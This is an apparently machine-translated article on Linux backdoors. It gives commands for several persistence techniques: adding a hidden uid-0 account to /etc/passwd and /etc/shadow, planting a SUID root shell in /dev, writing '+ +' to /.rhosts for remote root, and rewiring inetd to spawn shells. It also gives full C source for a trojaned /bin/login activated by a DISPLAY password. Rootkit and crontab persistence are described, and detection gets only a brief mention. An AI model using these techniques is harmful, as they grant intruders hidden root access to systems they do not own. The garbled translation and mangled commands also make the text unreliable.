Hacker technology advanced skills and practice Linux backdoors

Introduction to intruders full back door control system, to facilitate the next time you access and use of a technology.

General by modifying the system configuration file and install a third-party tools to implement the back door. Has a hidden, can bypass the system log, not easily found by the system administrator. Common backdoor technology increases the super user account cracking/Sniffer user password placed SUIDSell rhosts ++ use system service TCP/UDP/ICMPSell Crontab scheduled tasks shared library file Kit mountable kernel module rootkit (LKM) increase root # echo "e4gle: x: 0: 0::/:/bin/sh" > >/etc/passwd # echo "e4gle::-1:-1:-1:-1:-1:-1: 500" > >/etc/shadow if the system does not allow the uid = 0 in the user log in remotely, you also need to add a normal user account. Crack/sniff the user password for shadow file, use a tool to crack weak JohntheRipper user password. Installation tools, such as sniff sniffit listens to telnet, FTP port, collect the user's password. Place the SUIDSell # cp/bin/bash/dev/.rootsell # chmodu + s/dev/.rootsell ordinary users to run in native, you can obtain a/dev/.rootshell root permissions of shell. Rhosts ++ # echo "+ +" >/.rhosts # rsh-lrootvictim.comcs-I can get a rootshell remotely. Use of system services program. Modify/etc/inetd.conf, daytimestreamtcpnowait/bin/shsh-I; replace with the trojan programs, such as in.telnetd in.rexecd inted service program, redirect login program. TCP/UDP/ICMPSell BindShell, mostly based on TCP/UDP protocols of network services programs, high port sniffing, can easily be found. PingBackdoor ICMP packet activation by a Shell back door. TCPACK packet back door, to be able to travel across the firewall. Crontab scheduled task scheduling through the Crontab program installed backdoor scheduled run, usually in the late evening hours, is the system administrator is not online. Shared library file in a shared library embedded backdoor function uses the backdoor password activation Shell, obtain permission to escape the system administrator on binary checksum of the file itself. Kit Rootkit contains a series of systems and the backdoor tool:-clear log in logon log-camouflage checksum-replace netstat, ps, and other network tools-backdoor login program is easy to install and use to load kernel modules (LKM) LKM: dynamic loading of LoadableKernelModules, do not need to recompile the kernel. Intercepted system call, with the hidden directories, files, processes, network connections, and other powerful features. Their invisibility, find difficult. Famous adore LKM and knark Pack. Backdoor detection to my own experience, combined with specific tools, hand work some testing. Use md5 checksum Tripwire or to check the system. With the IDS system, listen to the target machine's suspicious network connection. Example: Login backdoor intruder put original/bin/login backup, and then replace with a paragraph/bin/login. Intruder Telnet came in through the environment variable, or a terminal type, pass the correct backdoor password, will directly receive a Shell; if it is a normal user log in, you will be redirected to the original login file, to handle the normal login. The most simple login backdoor ulogin.c source: instance: login backdoor # include # definePASSWORD "passWORD" # define_PATH_LOGIN "/sbin/logins" main (argc, argv, envp) intargc; char ** argv, * the * envp; {char * display = getenv ("DISPLAY"); if (display == NULL) {execve (_PATH_LOGIN, argv, envp);　　 perror(_PATH_LOGIN); exit(1); }　if(!strcmp(display,PASSWORD)){　　system("/bin/cs"); exit(1); }　execve(_PATH_LOGIN,argv,envp); exit(1);} Use the backdoor login first Telnet service is turned on, on your own machine: bash $ exportDISPLAY = passWORDbash $ telnetvictim.comTryingxxx.xxx.xxx.xxx ... Connectedtovictim.com (xxx.xxx.xxx.xxx) .Escapecharacteris ' ^] '.% _ Strings command striNgs command can print out a binary file to display the string used to earlier ulogin program: bash $ stringsulogin/lib/ld-linux.so.2..............DISPLAY/sbin/loginspassWORD/bin/cs